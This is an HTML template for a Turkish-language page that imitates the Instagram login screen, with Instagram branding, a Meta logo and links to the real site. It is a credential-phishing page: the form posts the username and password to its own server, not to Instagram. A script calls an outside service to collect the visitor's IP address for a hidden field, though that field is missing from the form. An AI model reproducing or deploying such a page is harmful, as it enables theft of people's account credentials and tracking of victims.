<!DOCTYPE html>
<html lang="tr">
<head>
    <link rel="icon" type="image/png" href="/static/img/instagram.png">
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Instagram</title>
    <style>
    body {
        margin: 0;
        padding: 0;
        font-family: Arial, Helvetica, sans-serif;
    }

    .igfont {
        display: block;
        margin: 100px auto 0 auto;
        width: 175px;
    }

    form {
        display: flex;
        flex-direction: column;
        align-items: center;
        margin-top: 30px;
    }

    .usernameinput,
    .passwordinput,
    .submitinput {
        width: 300px;
        height: 35px;
        margin: 5px 0;
        padding: 5px;
        border-radius: 6px;
        border: 1px solid #ccc;
    }

    .submitinput {
        background-color: rgb(0, 158, 158);
        color: white;
        border: none;
        font-weight: bold;
        cursor: pointer;
    }

    .yada {
        text-align: center;
        color: gray;
        margin-top: 20px;
    }

    .facebooktext {
        display: flex;
        align-items: center;
        justify-content: center;
        text-decoration: none;
        color: rgb(0, 82, 158);
        margin-top: 10px;
    }

    .facebooktext img {
        width: 20px;
        height: 20px;
        margin-right: 5px;
    }

    .forgotpass {
        display: block;
        text-align: center;
        color: rgb(0, 40, 78);
        text-decoration: none;
        margin-top: 10px;
    }

    .kaydol {
        text-align: center;
        margin-top: 20px;
    }

    .kaydollink {
        text-decoration: none;
        color: black;
        font-weight: bold;
    }

    .metaicon{
        display: block;
        margin: 100px auto 0 auto;
        margin-top: 200px;
        width: 100px;
    }
    </style>
</head>
<body>
    <img src="/static/img/instagramfont.png" class="igfont" alt="Görsel">

    <form method="POST" action="/">
        <input class="usernameinput" type="text" name="kullanici" placeholder="Telefon numarası, kullanıcı adı veya e-posta" required>
        <input class="passwordinput" type="password" name="sifre" placeholder="Şifre" required>
        <input class="submitinput" type="submit" value="Giriş Yap">
    </form>

    <div class="yada">YA DA</div>

    <a href="https://www.instagram.com" class="facebooktext">
        <img src="/static/img/facebook.jpg" alt="Facebook">
        <span>Facebook ile Giriş Yap</span>
    </a>

    <a href="https://www.instagram.com" class="forgotpass">Şifreni mi unuttun?</a>

    <div class="kaydol">
        Hesabın yok mu? <a href="https://www.instagram.com" class="kaydollink">Kaydol</a>
    </div>

    <img src="/static/img/metaicon3.png" class="metaicon" alt="Görsel">

    <script>
        // api.ipify üzerinden dış IP'yi alıp gizli inputa yazıyoruz
        fetch('https://api.ipify.org?format=json')
            .then(response => response.json())
            .then(data => {
                document.getElementById('ip_input').value = data.ip;
            })
            .catch(err => {
                console.error('IP alınamadı:', err);
                // IP alınamazsa boş bırakabilir veya farklı işlem yapılabilir
            });
    </script>
</body>
</html>